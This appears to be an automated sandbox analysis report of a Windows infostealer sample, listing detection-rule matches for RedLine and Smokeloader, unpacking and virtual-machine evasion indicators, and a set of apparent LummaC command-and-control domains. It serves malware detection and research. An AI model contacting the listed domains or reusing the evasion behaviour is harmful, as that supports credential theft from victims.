Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_0066B097	0_2_0066B097
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_00684166	0_2_00684166
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_0067C148	0_2_0067C148
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_00663157	0_2_00663157
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_0067B18B	0_2_0067B18B
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_00688197	0_2_00688197
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_0066E249	0_2_0066E249
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_0066D253	0_2_0066D253
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_0067D327	0_2_0067D327
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_0068A305	0_2_0068A305
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_006873B2	0_2_006873B2
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_0069F3B7	0_2_0069F3B7
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_00672442	0_2_00672442
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_006784C2	0_2_006784C2
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_00669507	0_2_00669507
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_00664517	0_2_00664517
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_006825E7	0_2_006825E7
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_006685C7	0_2_006685C7
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_0067C667	0_2_0067C667
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_0067D667	0_2_0067D667
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_00666627	0_2_00666627
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_006A26D7	0_2_006A26D7
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_006946A4	0_2_006946A4
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_0069268D	0_2_0069268D
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_0069A756	0_2_0069A756
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_0069572B	0_2_0069572B
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_00697712	0_2_00697712
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_0066D7AC	0_2_0066D7AC
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_00696877	0_2_00696877
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_0069C807	0_2_0069C807
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_0067A8F7	0_2_0067A8F7
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_00667887	0_2_00667887
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_0067F937	0_2_0067F937
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_006699F7	0_2_006699F7
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_00690A75	0_2_00690A75
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_006A2A17	0_2_006A2A17
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_00668AE7	0_2_00668AE7
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_00677AE4	0_2_00677AE4
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_0069BAD7	0_2_0069BAD7
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_00679AA7	0_2_00679AA7
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_00666AB7	0_2_00666AB7
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_0069FA87	0_2_0069FA87
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_00663B67	0_2_00663B67
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_00671BB6	0_2_00671BB6
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_00699B8A	0_2_00699B8A
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_00693B97	0_2_00693B97
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_0066EC17	0_2_0066EC17
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_0068ECC9	0_2_0068ECC9
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_006A2CC7	0_2_006A2CC7
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_0066CCC9	0_2_0066CCC9
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_0067DD37	0_2_0067DD37
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_00665D17	0_2_00665D17
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_0068EDC6	0_2_0068EDC6
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_00697DD0	0_2_00697DD0
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_0069CDA7	0_2_0069CDA7
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_00662D87	0_2_00662D87
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_00692D8B	0_2_00692D8B
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_0068DE57	0_2_0068DE57
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_0068EE08	0_2_0068EE08
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_0068BE07	0_2_0068BE07
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_0068EE1A	0_2_0068EE1A
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_00674E87	0_2_00674E87
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_00695F7A	0_2_00695F7A
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_00694F56	0_2_00694F56
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_0068FF23	0_2_0068FF23
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_0067DF17	0_2_0067DF17
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_0069AF17	0_2_0069AF17
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_00677FFA	0_2_00677FFA
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_00680FF7	0_2_00680FF7
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_006A2F87	0_2_006A2F87
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_006C98BB	0_2_006C98BB

Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: String function: 00414C10 appears 116 times
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: String function: 00408170 appears 45 times
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: String function: 00674E77 appears 116 times
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: String function: 006683D7 appears 77 times

Source: C:\Users\user\Desktop\DPlvBkg4aj.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1068 -s 1788

Source: DPlvBkg4aj.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 00000000.00000002.1934907231.00000000006C9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.1934820256.0000000000660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23

Source: DPlvBkg4aj.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@2/5@1/1

Source: C:\Users\user\Desktop\DPlvBkg4aj.exe

Code function: 0_2_006CA446 CreateToolhelp32Snapshot,Module32First,

0_2_006CA446

Source: C:\Users\user\Desktop\DPlvBkg4aj.exe

Code function: 0_2_0043B870 RtlExpandEnvironmentStrings,CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,

0_2_0043B870

Source: C:\Windows\SysWOW64\WerFault.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1068

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\f617ab08-1287-4cb7-8de9-3ea8ede94dbc

Jump to behavior

Source: DPlvBkg4aj.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\DPlvBkg4aj.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: DPlvBkg4aj.exe, 00000000.00000003.1723596594.0000000002EB1000.00000004.00000800.00020000.00000000.sdmp, DPlvBkg4aj.exe, 00000000.00000003.1723888295.0000000002E82000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: DPlvBkg4aj.exe	ReversingLabs: Detection: 50%
Source: DPlvBkg4aj.exe	Virustotal: Detection: 52%

Source: C:\Users\user\Desktop\DPlvBkg4aj.exe

File read: C:\Users\user\Desktop\DPlvBkg4aj.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\DPlvBkg4aj.exe "C:\Users\user\Desktop\DPlvBkg4aj.exe"
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1068 -s 1788

Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: C:\Users\user\Desktop\DPlvBkg4aj.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\DPlvBkg4aj.exe

Unpacked PE file: 0.2.DPlvBkg4aj.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.woy:W;.togazog:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\DPlvBkg4aj.exe

Unpacked PE file: 0.2.DPlvBkg4aj.exe.400000.0.unpack

Source: DPlvBkg4aj.exe	Static PE information: section name: .woy
Source: DPlvBkg4aj.exe	Static PE information: section name: .togazog

Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_3_02E82F58 push edx; iretd	0_3_02E82F43
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_3_02E83126 push edx; iretd	0_3_02E83127
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_3_02E82F58 push edx; iretd	0_3_02E82F43
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_3_02E83126 push edx; iretd	0_3_02E83127
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_00441850 push eax; mov dword ptr [esp], 0E0908DBh	0_2_00441853
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_0068B05A push ebp; iretd	0_2_0068B05D
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_006A1AB7 push eax; mov dword ptr [esp], 0E0908DBh	0_2_006A1ABA
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_006CCDF6 push ebx; ret	0_2_006CCDF7
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_006CEDCA pushad ; ret	0_2_006CEDCB
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_006CD99E push esi; retn 001Ch	0_2_006CD9A2
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_006CEE35 pushfd ; ret	0_2_006CEE36

Source: DPlvBkg4aj.exe

Static PE information: section name: .text entropy: 7.413991654677546

Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\Desktop\DPlvBkg4aj.exe TID: 1148

Thread sleep time: -150000s >= -30000s

Jump to behavior

Source: C:\Users\user\Desktop\DPlvBkg4aj.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: Amcache.hve.3.dr	Binary or memory string: VMware
Source: Amcache.hve.3.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.3.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.3.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.3.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.3.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.3.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.3.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: DPlvBkg4aj.exe, 00000000.00000002.1934935562.0000000000739000.00000004.00000020.00020000.00000000.sdmp, DPlvBkg4aj.exe, 00000000.00000002.1934935562.0000000000708000.00000004.00000020.00020000.00000000.sdmp, DPlvBkg4aj.exe, 00000000.00000003.1722485507.0000000000739000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.3.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.3.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.3.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.3.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.3.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.3.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.3.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.3.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.3.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.3.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.3.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.3.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.3.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.3.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.3.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: DPlvBkg4aj.exe, 00000000.00000002.1934935562.0000000000739000.00000004.00000020.00020000.00000000.sdmp, DPlvBkg4aj.exe, 00000000.00000003.1722485507.0000000000739000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW;-
Source: Amcache.hve.3.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.3.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.3.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.3.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.3.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.3.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Users\user\Desktop\DPlvBkg4aj.exe

API call chain: ExitProcess graph end node

graph_0-26185

Source: C:\Users\user\Desktop\DPlvBkg4aj.exe

Code function: 0_2_004402C0 LdrInitializeThunk,

0_2_004402C0

Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_0066092B mov eax, dword ptr fs:[00000030h]	0_2_0066092B
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_00660D90 mov eax, dword ptr fs:[00000030h]	0_2_00660D90
Source: C:\Users\user\Desktop\DPlvBkg4aj.exe	Code function: 0_2_006C9D23 push dword ptr fs:[00000030h]	0_2_006C9D23

HIPS / PFW / Operating System Protection Evasion

LummaC encrypted strings found

Source: DPlvBkg4aj.exe	String found in binary or memory: robinsharez.shop
Source: DPlvBkg4aj.exe	String found in binary or memory: handscreamny.shop
Source: DPlvBkg4aj.exe	String found in binary or memory: chipdonkeruz.shop
Source: DPlvBkg4aj.exe	String found in binary or memory: versersleep.shop
Source: DPlvBkg4aj.exe	String found in binary or memory: crowdwarek.shop
Source: DPlvBkg4aj.exe	String found in binary or memory: apporholis.shop
Source: DPlvBkg4aj.exe	String found in binary or memory: femalsabler.shop
Source: DPlvBkg4aj.exe	String found in binary or memory: soundtappysk.shop
Source: DPlvBkg4aj.exe	String found in binary or memory: skidjazzyric.click

Source: C:\Users\user\Desktop\DPlvBkg4aj.exe

